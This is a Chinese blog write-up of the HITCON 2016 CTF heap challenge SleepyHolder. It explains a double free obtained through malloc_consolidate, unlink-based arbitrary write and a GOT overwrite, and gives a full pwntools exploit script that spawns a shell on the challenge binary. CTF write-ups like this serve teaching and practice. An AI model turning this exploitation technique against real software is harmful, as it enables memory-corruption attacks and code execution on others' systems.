Hitcon 2016 SleepyHolder-fastbin_dup_consolidate.c

已于 2023-06-04 12:07:40 修改
阅读量225 收藏 2
点赞数
分类专栏: PWN 文章标签: pwn
于 2023-06-04 12:05:50 首次发布
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/131027082
版权

参考/题目下载:
https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder
https://blog.csdn.net/seaaseesa/article/details/105856878

1,三联
在这里插入图片描述保护:基本都开了
功能:
0、唤醒功能;
1、创建-secret:
Small secret;
Big secret;
2、清除-secret;
3、修改-secret;

2,IDA分析功能
主函数:
在这里插入图片描述清除功能-free:
在这里插入图片描述
这四个指针都是BSS段的地址。
问题点:
未检查free的指针是否为空;
free后指针未至置为0;
导致:可以double free
而要想成功double free,仅一个fastbin的chunk不行。Fastbin对double free的检查机制是仅仅检查fastbin的头chunk是否与当前要释放的这个相同size的chunk地址一样。

修改功能:
在这里插入图片描述
if检查了指针;
导致:无法UAF

创建功能:
在这里插入图片描述可以创建3种规格,使用1和3规格,分别是创建fastchunk和largechunk(为了使fastchunk_bin到unsortbin中)。
扩展:创建2规格也行,就不用创建2个1规格的,因为astbin不能与top chunk相邻,否则直接它们合并。

思路

目前根据IDA分析出的条件:
double free;
bss段全局指针;

由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。unlink利用需要如下条件:
全局指针;
溢出-伪造chunk(目前分析出的条件无此项);

解决伪造chunk问题:
利用malloc_consolidate,来将fastbin的chunk从fastbin里卸下来,触发malloc_consolidate的条件是申请一个大的堆,功能里正好有这个功能。malloc_consolidate的功能就是把chunk从fastbin取出,相邻的chunk进行合并,并且会设置下一个chunk的prev_inuse位为0。当chunk从fastbin里取出后,我们就可以在再一次free这个chunk了,此时,fastbin里没有形成循环链表,一个chunk在fastbin,一个chunk在unosrted bin。关键的一点是下一个chunk的prev_inuse已经清零,我们将fastbin里的那个chunk申请回来,伪造一个chunk,然后释放下一个unsorted bin范围的chunk,就会发生unlink。

Unlink以后,实现了任意地址读写,改写got表。

payload

bss段指针:
buf = 0x6020D0

#!/usr/bin/env python
from pwn import *
context.log_level="debug"

r = process("./SleepyHolder")
elf = ELF('./SleepyHolder')
def add(t, s):
    r.recvuntil('3. Renew secret\n')
    r.sendline('1')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))
    r.recvuntil(': \n')
    r.send(s)

def de(t):
    r.recvuntil('3. Renew secret\n')
    r.sendline('2')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))

def update(t, s):
    r.recvuntil('3. Renew secret\n')
    r.sendline('3')
    r.recvuntil('Big secret\n')
    r.sendline(str(t))
    r.recvuntil(': \n')
    r.send(s)

def debug():
    gdb.attach(r)
    pause()

add(1, 'a')	#chunk1_fastbin_chunk
add(2, 'a')	#chunk2_largin_chunk-avoid (fastbin_chunk + top_chunk) conlidate
#debug()	#break1
de(1)
add(3, 'a')	#chunk3_larbin_chunk-bypass double free check
#debug()	#break3
de(1)	# double free
#debug()		#break2

f_ptr = 0x6020d0	# global buf_ptr
fake_chunk = p64(0) + p64(0x21)
fake_chunk += p64(f_ptr - 0x18) + p64(f_ptr-0x10)
fake_chunk += '\x20'
add(1, fake_chunk)	#chunk1
#debug()	#break4
de(2)			#unlink
#debug()	#break5

atoi_GOT = 0x602080
free_GOT = 0x602018
puts_GOT = 0x602020
puts_plt = 0x400760
atoi_offset = 0x36e70
system_offset = 0x45380

f = p64(0)	#again global buf_ptr
f += p64(atoi_GOT) + p64(puts_GOT) + p64(free_GOT)
f += p32(1)*3
update(1, f)
#debug()		#break6
update(1, p64(puts_plt)) #change puts_got - > puts_plt
debug()	#break7
de(2)		
s = r.recv(6)
libc_base = u64(s.ljust(8, '\x00')) - atoi_offset	#leak libc_base
system = libc_base + system_offset
update(1, p64(system))
#debug()
add(2, 'sh\0')
de(2)	#get_shell


r.interactive()

调试

  • break2
    绕过利用consolidation形成double free

在这里插入图片描述
对比验证:
fastbin与top_chunk合并了
在这里插入图片描述-break4

在这里插入图片描述

注意:consolidation形成的double free,malloc一次就free bin中的都取出来了。

  • break5

在这里插入图片描述- break6
在这里插入图片描述

-break7
在这里插入图片描述
利用已修改的put_plt泄露libc_base,然后getshell。

hercu1iz
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
sleepyHolder_hitcon_2016
z1r0的博客
04-09 361
sleepyHolder_hitcon_2016 查看保护 一个简单题目 这里没有清掉 攻击思路:利用fastbin_dup_consolidate这个手法实现double free。然后利用unlink攻击,改got为system发送sh即可getshell。 创建1和2类型的堆块,此时释放1,1会进fastbin。接下来申请3类型的堆,因为特别大所以1会进smallbin,此时再次释放1,就可以形成double free,申请回来1个1类型,会发现2的标志位还是0,所以可以使用unlink攻击来ge
sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)
seaaseesa的博客
04-30 1019
sleepyHolder_hitcon_2016 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。 Edit功能又验证标志,因此不能UAF编辑 Add功能可以创建三种规格的堆。 由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出, 而要想成功d...
2016 HITCON CTF SleepyHolder
Bill
04-22 1715
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate
九层台
03-08 440
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #define BASE 4...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
How_I_Hacked_Facebook_Again!.pdf
08-28
报告作者Orange Tsai是DEVCORE的安全研究员和HITCON CTF团队队长,专注于Web及应用安全研究。该文描述了如何通过预认证远程代码执行(Pre-auth RCE)攻击主流SSL VPNs,从而侵入企业内部网络,这与移动设备管理(MDM...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
全网最硬核PWN入门_图解分析
个人笔记
04-03 6605
PWNLinux环境下的基础知识从C源码到可执行文件的生成过程程序的编译与链接什么是可执行文件可执行文件分类PE/ELFELF文件格式区分节和段的存储区域加载ELF / 查看节和段区分布命令段(segment)与节(section)程序数据在内存中的组织分布大端序与小端序存储关键寄存器静态链接与动态链接常用汇编指令intel 和 AT&T汇编格式 序 PWN知识只有不断的重复,实践才能熟悉掌握。以下知识点以LINUX系统环境下为主要说明(Windows的会有点区别)。 Linux环境下的基础知识
buuctf(pwn
个人笔记
04-04 2858
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
2021/10/18-如何调试pwn的exp或payload
个人笔记
10-19 1741
《2021年10月18日》 【连续第18天总结】 首先需要明白的是,你调试的exp.py是你输入的内容(即程序获取用户输入的信息)。 通过exp.py脚本与程序交互执行你的输入,跟手动一次次输入并无两样,所以想通过下断点调试查看你希望看到的具体位置数据的方法是一样的。 pwn调试小技巧 pwntool工具中一些好用的模块 context.log_level="debug" //输出显示调试信息,即用户输入与程序交互的信息 context.terminal = ["tmux","splitw","-h"]
堆简介(heap)_上
个人笔记
07-18 806
堆堆的特性堆VS栈对比堆的数据结构最重要的堆表(空表 和 快表)空表快表堆管理策略 堆的特性 (1)堆是一种在程序运行时动态分配的内存。所谓动态是指所需内存的大小在程序设计时 不能预先决定,需要在程序运行时参考用户的反馈。 (2)堆在使用时需要程序员用专用函数进行申请,如 C 语言中的 malloc 等函数、C++中的 new 函数等都是最常见的分配堆内存的函数。堆内存申请有可能成功,也有可能失败,这与申 请内存的大小、机器性能和当前运行环境有关。 (3)一般用一个堆指针来使用申请得到的内存,读、写、释放都
CTF 2015: Search Engine-fastbin_dup_into_stack
个人笔记
05-24 770
参考: [1]https://gsgx.me/posts/9447-ctf-2015-search-engine-writeup/ [2]https://blog.csdn.net/weixin_38419913/article/details/103238963(掌握利用点,省略各种逆向细节) [3]https://bbs.kanxue.com/thread-267876.htm(逆向调试详解) [4]https://bbs.kanxue.com/thread-247219.htm(双解法) 1,三连 2
hitcontraining_uaf
个人笔记
04-28 767
8字节填充(利用点之一)=print_note_conten函数地址+print_note_content内容地址;例如一次add_note(),notelist[0]=&print_note_content。关注点:0x804b158[3] = node[0]= 0x080485fb等会被改写。一次add_note()malloc了两次,地址被notelist[]数组保存;notelist[]属于bss段全局变量,存储chunk。基本信息:x86-32-el,堆题思路;保护:Partial RELRO。
pwnable_orw-seccomp沙箱
个人笔记
04-11 733
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
ciscn_2019_s_4-栈迁移
最新发布
个人笔记
06-07 682
思路:由于无直接getshell的利用函数,溢出空间只有8字节(ebp+ret占用无法继续填充ROP了),所以需要栈迁移更大的空间来构造ROP。栈迁移位置:执行函数+0xdeadbeef(假ebp)+0xdeadbeef(假ret)+参数。此栈帧迁移到s[40]数组的位置,先通过第一次打印泄露s[40]的起始地址。栈迁移核心(通过ROPGadget寻找。ebp位置:栈迁移位置-4(32位)ret位置:leave_ret。题目类型猜测:栈溢出,栈迁移。作用:赋值执行函数调用。
[ZJCTF 2019]EasyHeap-patchlibc-调试
个人笔记
04-25 531
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18。heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];1、伪造chunk[2]=[全局地址-3];chunk[3] = [全局地址-2]通过修改chunk[3]的值 ->控制 &chunk[0] ->4、给任意地址填入内容,chunk[0] = [任意内容]3、填入控制任意地址,chunk[3] = [任意地址]chunk[3] ->实现[任意地址]写。
PWN_格式化字符串格式字符
个人笔记
03-04 516
格式化字符串格式字符 格式 含义 %c 输出字符,配上%n可用于向指定地址写数据。 %d 输出十进制整数,配上%n可用于向指定地址写数据。 %x 输出16进制数据,如%ix表示要泄漏偏移i处4字节长的16进制数据,x表示要泄漏偏移i处4字节长的16进制数据,%ix表示要泄漏偏移i处4字节长的16进制数据,lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。 %p 输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bi
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值